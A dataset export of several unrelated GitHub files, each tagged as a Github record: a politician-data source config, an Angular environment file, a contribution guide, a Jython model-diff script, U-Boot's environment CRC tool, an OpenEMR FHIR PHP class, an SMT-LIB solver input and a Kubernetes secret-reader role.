text
stringlengths
2
100k
meta
dict
{ "sources": [ { "file": "morph/official.csv", "create": { "from": "morph", "scraper": "duncanparkes/namibia", "query": "SELECT data.id, data.name, data.image, data.party, data.party AS party_id, terms.term_number AS term, data.email, data.area, data.details_url AS source from data JOIN terms ON data.term_id = terms.id WHERE chamber = 'National Assembly' ORDER BY data.id, term DESC" }, "source": "http://www.parliament.gov.na", "type": "membership", "sourcetype": "official" }, { "file": "morph/wikidata.csv", "create": { "from": "morph", "scraper": "tmtmtmtm/namibia-national-assembly-wikidata", "query": "SELECT * FROM data ORDER BY id" }, "source": "http://wikidata.org/", "type": "wikidata", "merge": { "incoming_field": "name", "existing_field": "name", "reconciliation_file": "reconciliation/wikidata.csv" } }, { "file": "manual/terms.csv", "type": "term" }, { "file": "morph/genderbalance.csv", "create": { "from": "morph", "scraper": "everypolitician-scrapers/namibia-assembly-gender-balance", "query": "SELECT uuid, gender FROM data ORDER BY uuid" }, "source": "http://gender-balance.org/", "type": "person", "merge": { "incoming_field": "uuid", "existing_field": "uuid" } }, { "file": "wikidata/groups.json", "type": "group", "create": { "from": "group-wikidata", "source": "manual/group_wikidata.csv" } }, { "file": "wikidata/positions.json", "type": "wikidata-positions", "create": { "from": "wikidata-raw", "source": "reconciliation/wikidata.csv" } }, { "file": "wikidata/elections.json", "type": "wikidata-elections", "create": { "from": "election-wikidata", "office": "Q21295994" } } ] }
{ "pile_set_name": "Github" }
// This file can be replaced during build by using the `fileReplacements` array. // `ng build --prod` replaces `environment.ts` with `environment.prod.ts`. // The list of file replacements can be found in `angular.json`. export const environment = { production: false }; /* * For easier debugging in development mode, you can import the following file * to ignore zone related error stack frames such as `zone.run`, `zoneDelegate.invokeTask`. * * This import should be commented out in production mode because it will have a negative impact * on performance if an error is thrown. */ // import 'zone.js/dist/zone-error'; // Included with Angular CLI.
{ "pile_set_name": "Github" }
# Contributing Contributions are **welcome** and will be fully **credited**. Please read and understand the contribution guide before creating an issue or pull request. ## Etiquette This project is open source, and as such, the maintainers give their free time to build and maintain the source code held within. They make the code freely available in the hope that it will be of use to other developers. It would be extremely unfair for them to suffer abuse or anger for their hard work. Please be considerate towards maintainers when raising issues or presenting pull requests. Let's show the world that developers are civilized and selfless people. It's the duty of the maintainer to ensure that all submissions to the project are of sufficient quality to benefit the project. Many developers have different skillsets, strengths, and weaknesses. Respect the maintainer's decision, and do not be upset or abusive if your submission is not used. ## Viability When requesting or submitting new features, first consider whether it might be useful to others. Open source projects are used by many developers, who may have entirely different needs to your own. Think about whether or not your feature is likely to be used by other users of the project. ## Procedure Before filing an issue: - Attempt to replicate the problem, to ensure that it wasn't a coincidental incident. - Check to make sure your feature suggestion isn't already present within the project. - Check the pull requests tab to ensure that the bug doesn't have a fix in progress. - Check the pull requests tab to ensure that the feature isn't already in progress. Before submitting a pull request: - Check the codebase to ensure that your feature doesn't already exist. - Check the pull requests to ensure that another person hasn't already submitted the feature or fix. ## Requirements If the project maintainer has any additional requirements, you will find them listed here. - **[PSR-2 Coding Standard](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-2-coding-style-guide.md)** - The easiest way to apply the conventions is to install [PHP Code Sniffer](http://pear.php.net/package/PHP_CodeSniffer). - **Add tests!** - Your patch won't be accepted if it doesn't have tests. - **Document any change in behaviour** - Make sure the `README.md` and any other relevant documentation are kept up-to-date. - **Consider our release cycle** - We try to follow [SemVer v2.0.0](http://semver.org/). Randomly breaking public APIs is not an option. - **One pull request per feature** - If you want to do more than one thing, send multiple pull requests. - **Send coherent history** - Make sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash them](http://www.git-scm.com/book/en/v2/Git-Tools-Rewriting-History#Changing-Multiple-Commit-Messages) before submitting. **Happy coding**!
{ "pile_set_name": "Github" }
# Copyright (c) 2019, 2020, Oracle Corporation and/or its affiliates. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl. # # ------------ # Description: # ------------ # # This code compares python dictionaries. It is used to compare the new vs the old version. # output is written as csv file /tmp/model_diff_rc containing the return codes that represent the differences. # also the actual difference in model as yaml and json /tmp/diffed_model.json /tmp/diffed_model.yaml # # This script is invoked by jython. See modelInImage.sh diff_model # import re import sets import sys, os, traceback from java.lang import System UNSAFE_ONLINE_UPDATE=0 SAFE_ONLINE_UPDATE=1 FATAL_MODEL_CHANGES=2 MODELS_SAME=3 SECURITY_INFO_UPDATED=4 RCU_PASSWORD_CHANGED=5 # The following class is borrowed directly from the WDT project's yaml_tranlator.py class PythonToYaml: """ A class that converts a Python dictionary into Yaml and writes the output to a file. """ # 4 spaces _indent_unit = ' ' _requires_quotes_chars_regex = '[:{}\[\],&*#?|<>=!%@`-]' def __init__(self): return def _write_dictionary_to_yaml_file(self, dictionary, writer, indent=''): """ Do the actual heavy lifting of converting a dictionary and writing it to the file. This method is called recursively when a value of the dictionary entry is itself a dictionary. :param dictionary: the Python dictionary to convert :param writer: the java.io.PrintWriter for the output file :param indent: the amount of indent to use (based on the level of recursion) :raises: IOException: if an error occurs while writing the output """ if dictionary is None: return for key, value in dictionary.iteritems(): quoted_key = self._quotify_string(key) if isinstance(value, dict): writer.write(indent + quoted_key + ':' + '\n') self._write_dictionary_to_yaml_file(value, writer, indent + self._indent_unit) else: writer.write(indent + quoted_key + ': ' + self._get_value_string(value) + '\n') return def _get_value_string(self, value): """ Convert the Python value into the proper Yaml value :param value: the Python value :return: the Yaml value """ if value is None: result = 'null' elif type(value) is int or type(value) is long or type(value) is float: result = str(value) elif type(value) is list: new_value = '[' for element in value: new_value += ' ' + self._get_value_string(element) + ',' if len(new_value) > 1: new_value = new_value[:-1] new_value += ' ]' result = str(new_value) else: result = self._quotify_string(str(value)) return result def _quotify_string(self, text): """ Insert quotes around the string value if it contains Yaml special characters that require it. :param text: the input string :return: the quoted string, or the original string if no quoting was required """ if bool(re.search(self._requires_quotes_chars_regex, text)): result = '\'' + self._quote_embedded_quotes(text) + '\'' else: result = self._quote_embedded_quotes(text) return result def _quote_embedded_quotes(self, text): """ Replace any embedded quotes with two quotes. :param text: the text to quote :return: the quoted text """ result = text if '\'' in text: result = result.replace('\'', '\'\'') if '"' in text: result = result.replace('"', '""') return result class ModelDiffer: def __init__(self, current_dict, past_dict): self.final_changed_model=dict() self.current_dict = current_dict self.past_dict = past_dict self.set_current = sets.Set() self.set_past = sets.Set() for item in self.current_dict.keys(): self.set_current.add(item) for item in self.past_dict.keys(): self.set_past.add(item) self.intersect = self.set_current.intersection(self.set_past) def added(self): return self.set_current - self.intersect def removed(self): return self.set_past - self.intersect def changed(self): result = sets.Set() for o in self.intersect: if self.past_dict[o] != self.current_dict[o]: result.add(o) return result def unchanged(self): result = sets.Set() for o in self.intersect: if self.past_dict[o] == self.current_dict[o]: result.add(o) return result def print_diff(self,s, category): print category if len(s) > 0: print s def recursive_changed_detail(self, key, token, root): debug("DEBUG: Entering recursive_changed_detail key=%s token=%s root=%s", key, token, root) a=ModelDiffer(self.current_dict[key], self.past_dict[key]) diff=a.changed() added=a.added() removed=a.removed() saved_token=token debug('DEBUG: In recursive changed detail %s', diff) debug('DEBUG: In recursive added detail %s', added) if len(diff) > 0: for o in diff: token=saved_token # The token is a | separated string that is used to parse and rebuilt the structure later debug('DEBUG: in recursive changed detail walking down 1 %s', o) token=token+'|'+o if a.is_dict(o): debug('DEBUG: in recursive changed detail walking down 2 %s', token) a.recursive_changed_detail(o,token, root) last=token.rfind('|') token=root else: all_changes.append(token) last=token.rfind('|') token=root # already out of recursive calls, add all entries from current dictionary # resources.JDBCSubsystemResources.* (note it may not have the lower level nodes added_token=token debug('DEBUG: current added token %s' , added_token) if len(added) > 0: for item in added: token=saved_token debug('DEBUG: recursive added token %s item %s ', token, item) all_added.append(token + '|' + item) # We don't really care about this, just put something here is enough if len(removed) > 0: for item in removed: debug('DEBUG: removed %s', item) all_removed.append(token + '|' + item) debug('DEBUG: Exiting recursive_changed_detail') def is_dict(self,key): if isinstance(self.current_dict[key],dict): return 1 else: return 0 def calculate_changed_model(self): """ Calculate the changed model. """ result = dict() changed=self.changed() for s in changed: token=s self.recursive_changed_detail(s, token, s) self._add_results(all_changes) self._add_results(all_added) # TODO: delete needs more work, not simply added to the results #self._add_results(all_removed) def _add_results(self, ar_changes): # The ar_changes is the keys of changes in the dotted format # 'resources|JDBCSystemResource|Generic2|JdbcResource|JDBCConnectionPoolParams|TestConnectionsOnReserve # # Now change it to python dictionrary for item in ar_changes: debug('DEBUG: add_results %s', item) splitted=item.split('|',1) n=len(splitted) result=dict() walked=[] while n > 1: tmp=dict() tmp[splitted[0]]=dict() if len(result) > 0: # traverse to the leaf leaf=result for k in walked: leaf = leaf[k] leaf[splitted[0]]=dict() walked.append(splitted[0]) else: result=tmp walked.append(splitted[0]) splitted=splitted[1].split('|',1) n=len(splitted) # # result is the dictionary format # leaf=result value_tree=self.current_dict for k in walked: leaf = leaf[k] value_tree=value_tree[k] # walk the current dictionary and set the value # doesn't work in delete case # leaf[splitted[0]] = value_tree[splitted[0]] self.merge_dictionaries(self.final_changed_model, result) def merge_dictionaries(self, dictionary, new_dictionary): """ Merge the values from the new dictionary to the existing one. :param dictionary: the existing dictionary :param new_dictionary: the new dictionary to be merged """ for key in new_dictionary: new_value = new_dictionary[key] if key not in dictionary: dictionary[key] = new_value else: value = dictionary[key] if isinstance(value, dict) and isinstance(new_value, dict): self.merge_dictionaries(value, new_value) else: dictionary[key] = new_value def is_safe_diff(self, model): """ Is it a safe difference for update. :param model: diffed model return 0 - always return 0 for V1 """ # check for phase 1 any security changes in the domainInfo intersection if model.has_key('domainInfo'): domain_info = model['domainInfo'] if domain_info.has_key('AdminUserName') or domain_info.has_key('AdminPassword') \ or domain_info.has_key('WLSRoles'): changed_items.append(SECURITY_INFO_UPDATED) if domain_info.has_key('RCUDbInfo'): rcu_db_info = domain_info['RCUDbInfo'] if rcu_db_info.has_key('rcu_schema_password'): changed_items.append(RCU_PASSWORD_CHANGED) if rcu_db_info.has_key('rcu_db_conn_string') \ or rcu_db_info.has_key('rcu_prefix'): changed_items.append(SECURITY_INFO_UPDATED) return 0 def _is_safe_addition(self, items): """ check the items in all_added to see if can be used for online update return 0 false ; 1 true ; 2 for fatal """ # allows add attribute to existing entity found_in_past_dictionary = 1 has_topology=0 for itm in items: if itm.find('topology.') == 0: has_topology = 1 debug('DEBUG: is_safe_addition %s', itm) found_in_past_dictionary = self._in_model(self.past_dict, itm) debug('DBUEG: found_in_past_dictionary %s', found_in_past_dictionary) if not found_in_past_dictionary: break else: # check whether it is in the forbidden list if self.in_forbidden_list(itm): print 'Found changes not supported for update: %s. Exiting' % (itm) return FATAL_MODEL_CHANGES # if there is a shape change # return 2 ? if has_topology and not found_in_past_dictionary: print 'Found changes not supported for update: %s. Exiting' % (itm) return FATAL_MODEL_CHANGES if found_in_past_dictionary: return SAFE_ONLINE_UPDATE # allow new additions for anything ?? return SAFE_ONLINE_UPDATE def _in_model(self, dictionary, keylist): """ check whether the keys is in the dictionary :param dictionary dictonary to check :param keylist dot separted key list return 1 if it is in model 0 if it is not in model """ debug('DBEUG: in model keylist=%s dictionary %s', keylist, dictionary) splitted=keylist.split('|') n=len(splitted) i=0 root_key = splitted[0] # loop through the keys and use it to walk the dictionary # if it can walk down 3 levels, safely assume it is in the # dictionary, otherwise it is a total new addition for i in range(0, n): if dictionary.has_key(splitted[i]): if isinstance(dictionary[splitted[i]], dict): dictionary = dictionary[splitted[i]] continue else: break if i > 2: return 1 return 0 def in_forbidden_list(self, itm): forbidden_list = [ '.ListenPort', '.ListenAddress' ] for forbidden in forbidden_list: if itm.endswith(forbidden): return 1 return 0 def get_final_changed_model(self): """ Return the changed model. """ return self.final_changed_model class ModelFileDiffer: def __init__(self, current_dict, past_dict): self.current_dict_file = current_dict self.past_dict_file = past_dict def eval_file(self, file): true = True false = False fh = open(file, 'r') content = fh.read() return eval(content) def write_dictionary_to_json_file(self, dictionary, writer, indent=''): """ Write the python dictionary in json syntax using the provided writer stream. :param dictionary: python dictionary to convert to json syntax :param writer: where to write the dictionary into json syntax :param indent: current string indention of the json syntax. If not provided, indent is an empty string """ _start_dict = "{\n" _end_dict = "}\n" if dictionary is None: return end_line = '' writer.write(_start_dict) end_indent = indent indent += ' ' for key, value in dictionary.iteritems(): writer.write(end_line) end_line = ",\n" writer.write(indent + '"' + self.quote_embedded_quotes(key) + '" : ') if isinstance(value, dict): self.write_dictionary_to_json_file(value, writer, indent) else: writer.write(self.format_json_value(value)) writer.write(str(end_indent + _end_dict)) return def quote_embedded_quotes(self, text): """ Quote all embedded double quotes in a string with a backslash. :param text: the text to quote :return: the quotes result """ result = text if type(text) is str and '"' in text: result = text.replace('"', '\\"') return result def format_json_value(self, value): """ Format the value as a JSON snippet. :param value: the value :return: the JSON snippet """ import java.lang.StringBuilder as StringBuilder builder = StringBuilder() debug("DEBUG: value %s TYPE %s", value, type(value)) if type(value) == bool or (type(value) == str and (value == 'true' or value == 'false')): if value: v = "true" else: v = "false" builder.append(v) elif type(value) == str: builder.append('"').append(self.quote_embedded_quotes(value)).append('"') elif type(value) == list: builder.append("[ ") ind = 0 for list_item in value: if ind > 0: builder.append(", ") builder.append('"').append(list_item).append('"') ind = ind+1 builder.append(" ]") else: builder.append(value) return builder.toString() def compare(self): current_dict = self.eval_file(sys.argv[1]) past_dict = self.eval_file(sys.argv[2]) obj = ModelDiffer(current_dict, past_dict) obj.calculate_changed_model() net_diff = obj.get_final_changed_model() fh = open('/tmp/diffed_model.json', 'w') self.write_dictionary_to_json_file(net_diff, fh) #print all_added fh.close() fh = open('/tmp/diffed_model.yaml', 'w') pty = PythonToYaml() pty._write_dictionary_to_yaml_file(net_diff, fh) fh.close() return obj.is_safe_diff(net_diff) def debug(format_string, *arguments): if os.environ.has_key('DEBUG_INTROSPECT_JOB'): print format_string % (arguments) return def main(): try: obj = ModelFileDiffer(sys.argv[1], sys.argv[2]) rc=obj.compare() rcfh = open('/tmp/model_diff_rc', 'w') rcfh.write(",".join(map(str,changed_items))) rcfh.close() System.exit(0) except: exc_type, exc_obj, exc_tb = sys.exc_info() eeString = traceback.format_exception(exc_type, exc_obj, exc_tb) print eeString System.exit(-1) if __name__ == "__main__": all_changes = [] all_added = [] all_removed = [] changed_items = [] main()
{ "pile_set_name": "Github" }
/* * (C) Copyright 2001 * Paolo Scaffardi, AIRVENT SAM s.p.a - RIMINI(ITALY), [email protected] * * SPDX-License-Identifier: GPL-2.0+ */ #include <errno.h> #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #ifndef __ASSEMBLY__ #define __ASSEMBLY__ /* Dirty trick to get only #defines */ #endif #define __ASM_STUB_PROCESSOR_H__ /* don't include asm/processor. */ #include <config.h> #undef __ASSEMBLY__ #if defined(CONFIG_ENV_IS_IN_FLASH) # ifndef CONFIG_ENV_ADDR # define CONFIG_ENV_ADDR (CONFIG_SYS_FLASH_BASE + CONFIG_ENV_OFFSET) # endif # ifndef CONFIG_ENV_OFFSET # define CONFIG_ENV_OFFSET (CONFIG_ENV_ADDR - CONFIG_SYS_FLASH_BASE) # endif # if !defined(CONFIG_ENV_ADDR_REDUND) && defined(CONFIG_ENV_OFFSET_REDUND) # define CONFIG_ENV_ADDR_REDUND (CONFIG_SYS_FLASH_BASE + CONFIG_ENV_OFFSET_REDUND) # endif # ifndef CONFIG_ENV_SIZE # define CONFIG_ENV_SIZE CONFIG_ENV_SECT_SIZE # endif # if defined(CONFIG_ENV_ADDR_REDUND) && !defined(CONFIG_ENV_SIZE_REDUND) # define CONFIG_ENV_SIZE_REDUND CONFIG_ENV_SIZE # endif # if (CONFIG_ENV_ADDR >= CONFIG_SYS_MONITOR_BASE) && \ ((CONFIG_ENV_ADDR + CONFIG_ENV_SIZE) <= (CONFIG_SYS_MONITOR_BASE + CONFIG_SYS_MONITOR_LEN)) # define ENV_IS_EMBEDDED # endif # if defined(CONFIG_ENV_ADDR_REDUND) || defined(CONFIG_ENV_OFFSET_REDUND) # define CONFIG_SYS_REDUNDAND_ENVIRONMENT # endif #endif /* CONFIG_ENV_IS_IN_FLASH */ #if defined(ENV_IS_EMBEDDED) && !defined(CONFIG_BUILD_ENVCRC) # define CONFIG_BUILD_ENVCRC #endif #ifdef CONFIG_SYS_REDUNDAND_ENVIRONMENT # define ENV_HEADER_SIZE (sizeof(uint32_t) + 1) #else # define ENV_HEADER_SIZE (sizeof(uint32_t)) #endif #define ENV_SIZE (CONFIG_ENV_SIZE - ENV_HEADER_SIZE) #ifdef CONFIG_BUILD_ENVCRC # include <environment.h> extern unsigned int env_size; extern env_t environment; #endif /* CONFIG_BUILD_ENVCRC */ extern uint32_t crc32 (uint32_t, const unsigned char *, unsigned int); int main (int argc, char **argv) { #ifdef CONFIG_BUILD_ENVCRC unsigned char pad = 0x00; uint32_t crc; unsigned char *envptr = (unsigned char *)&environment, *dataptr = envptr + ENV_HEADER_SIZE; unsigned int datasize = ENV_SIZE; unsigned int eoe; if (argv[1] && !strncmp(argv[1], "--binary", 8)) { int ipad = 0xff; if (argv[1][8] == '=') sscanf(argv[1] + 9, "%i", &ipad); pad = ipad; } if (pad) { /* find the end of env */ for (eoe = 0; eoe < datasize - 1; ++eoe) if (!dataptr[eoe] && !dataptr[eoe+1]) { eoe += 2; break; } if (eoe < datasize - 1) memset(dataptr + eoe, pad, datasize - eoe); } crc = crc32 (0, dataptr, datasize); /* Check if verbose mode is activated passing a parameter to the program */ if (argc > 1) { if (!strncmp(argv[1], "--binary", 8)) { int le = (argc > 2 ? !strcmp(argv[2], "le") : 1); size_t i, start, end, step; if (le) { start = 0; end = ENV_HEADER_SIZE; step = 1; } else { start = ENV_HEADER_SIZE - 1; end = -1; step = -1; } for (i = start; i != end; i += step) printf("%c", (crc & (0xFF << (i * 8))) >> (i * 8)); if (fwrite(dataptr, 1, datasize, stdout) != datasize) fprintf(stderr, "fwrite() failed: %s\n", strerror(errno)); } else { printf("CRC32 from offset %08X to %08X of environment = %08X\n", (unsigned int) (dataptr - envptr), (unsigned int) (dataptr - envptr) + datasize, crc); } } else { printf ("0x%08X\n", crc); } #else printf ("0\n"); #endif return EXIT_SUCCESS; }
{ "pile_set_name": "Github" }
<?php namespace OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide; /*! * This class was generated with the PHPFHIR library (https://github.com/dcarbone/php-fhir) using * class definitions from HL7 FHIR (https://www.hl7.org/fhir/) * * Class creation date: June 14th, 2019 * * PHPFHIR Copyright: * * Copyright 2016-2017 Daniel Carbone ([email protected]) * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * * FHIR Copyright Notice: * * Copyright (c) 2011+, HL7, Inc. * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * Neither the name of HL7 nor the names of its contributors may be used to * endorse or promote products derived from this software without specific * prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * * * Generated on Thu, Dec 27, 2018 22:37+1100 for FHIR v4.0.0 * * Note: the schemas & schematrons do not contain all of the rules about what makes resources * valid. Implementers will still need to be familiar with the content of the specification and with * any profiles that apply to the resources in order to make a conformant implementation. * */ use OpenEMR\FHIR\R4\FHIRElement\FHIRBackboneElement; /** * A set of rules of how a particular interoperability or standards problem is solved - typically through the use of FHIR resources. This resource is used to gather all the parts of an implementation guide into a logical whole and to publish a computable definition of all the parts. */ class FHIRImplementationGuideDefinition extends FHIRBackboneElement implements \JsonSerializable { /** * A logical group of resources. Logical groups can be used when building pages. * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping[] */ public $grouping = []; /** * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource. * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource[] */ public $resource = []; /** * A page / section in the implementation guide. The root page is the implementation guide home page. * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage */ public $page = null; /** * Defines how IG is built by tools. * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter[] */ public $parameter = []; /** * A template for building resources. * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate[] */ public $template = []; /** * @var string */ private $_fhirElementName = 'ImplementationGuide.Definition'; /** * A logical group of resources. Logical groups can be used when building pages. * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping[] */ public function getGrouping() { return $this->grouping; } /** * A logical group of resources. Logical groups can be used when building pages. * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping $grouping * @return $this */ public function addGrouping($grouping) { $this->grouping[] = $grouping; return $this; } /** * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource. * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource[] */ public function getResource() { return $this->resource; } /** * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource. * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource $resource * @return $this */ public function addResource($resource) { $this->resource[] = $resource; return $this; } /** * A page / section in the implementation guide. The root page is the implementation guide home page. * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage */ public function getPage() { return $this->page; } /** * A page / section in the implementation guide. The root page is the implementation guide home page. * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage $page * @return $this */ public function setPage($page) { $this->page = $page; return $this; } /** * Defines how IG is built by tools. * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter[] */ public function getParameter() { return $this->parameter; } /** * Defines how IG is built by tools. * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter $parameter * @return $this */ public function addParameter($parameter) { $this->parameter[] = $parameter; return $this; } /** * A template for building resources. * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate[] */ public function getTemplate() { return $this->template; } /** * A template for building resources. * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate $template * @return $this */ public function addTemplate($template) { $this->template[] = $template; return $this; } /** * @return string */ public function get_fhirElementName() { return $this->_fhirElementName; } /** * @param mixed $data */ public function __construct($data = []) { if (is_array($data)) { if (isset($data['grouping'])) { if (is_array($data['grouping'])) { foreach ($data['grouping'] as $d) { $this->addGrouping($d); } } else { throw new \InvalidArgumentException('"grouping" must be array of objects or null, ' . gettype($data['grouping']) . ' seen.'); } } if (isset($data['resource'])) { if (is_array($data['resource'])) { foreach ($data['resource'] as $d) { $this->addResource($d); } } else { throw new \InvalidArgumentException('"resource" must be array of objects or null, ' . gettype($data['resource']) . ' seen.'); } } if (isset($data['page'])) { $this->setPage($data['page']); } if (isset($data['parameter'])) { if (is_array($data['parameter'])) { foreach ($data['parameter'] as $d) { $this->addParameter($d); } } else { throw new \InvalidArgumentException('"parameter" must be array of objects or null, ' . gettype($data['parameter']) . ' seen.'); } } if (isset($data['template'])) { if (is_array($data['template'])) { foreach ($data['template'] as $d) { $this->addTemplate($d); } } else { throw new \InvalidArgumentException('"template" must be array of objects or null, ' . gettype($data['template']) . ' seen.'); } } } elseif (null !== $data) { throw new \InvalidArgumentException('$data expected to be array of values, saw "' . gettype($data) . '"'); } parent::__construct($data); } /** * @return string */ public function __toString() { return $this->get_fhirElementName(); } /** * @return array */ public function jsonSerialize() { $json = parent::jsonSerialize(); if (0 < count($this->grouping)) { $json['grouping'] = []; foreach ($this->grouping as $grouping) { $json['grouping'][] = $grouping; } } if (0 < count($this->resource)) { $json['resource'] = []; foreach ($this->resource as $resource) { $json['resource'][] = $resource; } } if (isset($this->page)) { $json['page'] = $this->page; } if (0 < count($this->parameter)) { $json['parameter'] = []; foreach ($this->parameter as $parameter) { $json['parameter'][] = $parameter; } } if (0 < count($this->template)) { $json['template'] = []; foreach ($this->template as $template) { $json['template'][] = $template; } } return $json; } /** * @param boolean $returnSXE * @param \SimpleXMLElement $sxe * @return string|\SimpleXMLElement */ public function xmlSerialize($returnSXE = false, $sxe = null) { if (null === $sxe) { $sxe = new \SimpleXMLElement('<ImplementationGuideDefinition xmlns="http://hl7.org/fhir"></ImplementationGuideDefinition>'); } parent::xmlSerialize(true, $sxe); if (0 < count($this->grouping)) { foreach ($this->grouping as $grouping) { $grouping->xmlSerialize(true, $sxe->addChild('grouping')); } } if (0 < count($this->resource)) { foreach ($this->resource as $resource) { $resource->xmlSerialize(true, $sxe->addChild('resource')); } } if (isset($this->page)) { $this->page->xmlSerialize(true, $sxe->addChild('page')); } if (0 < count($this->parameter)) { foreach ($this->parameter as $parameter) { $parameter->xmlSerialize(true, $sxe->addChild('parameter')); } } if (0 < count($this->template)) { foreach ($this->template as $template) { $template->xmlSerialize(true, $sxe->addChild('template')); } } if ($returnSXE) { return $sxe; } return $sxe->saveXML(); } }
{ "pile_set_name": "Github" }
(set-option :produce-unsat-model-interpolants true) (set-logic QF_NIA) (declare-fun v0 () Int) (assert (let ((e1 44)) (let ((e2 (- v0 v0))) (let ((e3 (- v0))) (let ((e4 (* e3 v0))) (let ((e5 (- v0 e2))) (let ((e6 (* e1 e5))) (let ((e7 (distinct e4 e5))) (let ((e8 (distinct v0 e4))) (let ((e9 (distinct e6 e5))) (let ((e10 (= e3 e4))) (let ((e11 (< e2 e4))) (let ((e12 (ite e8 e6 e5))) (let ((e13 (ite e8 e3 v0))) (let ((e14 (ite e10 e2 e5))) (let ((e15 (ite e9 e4 v0))) (let ((e16 (ite e11 e14 v0))) (let ((e17 (ite e10 e5 e12))) (let ((e18 (ite e7 e17 e15))) (let ((e19 (>= e13 e6))) (let ((e20 (<= e5 e5))) (let ((e21 (< e15 e12))) (let ((e22 (> e15 e6))) (let ((e23 (distinct e6 e2))) (let ((e24 (> e6 e2))) (let ((e25 (> e14 v0))) (let ((e26 (<= e18 e16))) (let ((e27 (>= e5 e2))) (let ((e28 (> e5 e12))) (let ((e29 (> e12 e5))) (let ((e30 (= e13 e12))) (let ((e31 (>= e3 e14))) (let ((e32 (>= e14 e4))) (let ((e33 (distinct e15 e17))) (let ((e34 (and e7 e8 e9 e10 e11 e19 e20 e21 e22 e23 e24 e25 e26 e27 e28 e29 e30 e31 e32 e33 ))) e34 ))))))))))))))))))))))))))))))))))) (check-sat-assuming-model (v0) ((- 58))) (get-unsat-model-interpolant)
{ "pile_set_name": "Github" }
--- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: dapr-secret-reader namespace: dapr-tests roleRef: apiGroup: rbac.authorization.k8s.io kind: Role name: secret-reader subjects: - kind: ServiceAccount name: default namespace: dapr-tests --- apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: secret-reader namespace: dapr-tests rules: - apiGroups: [""] resources: ["secrets"] verbs: ["get"]
{ "pile_set_name": "Github" }
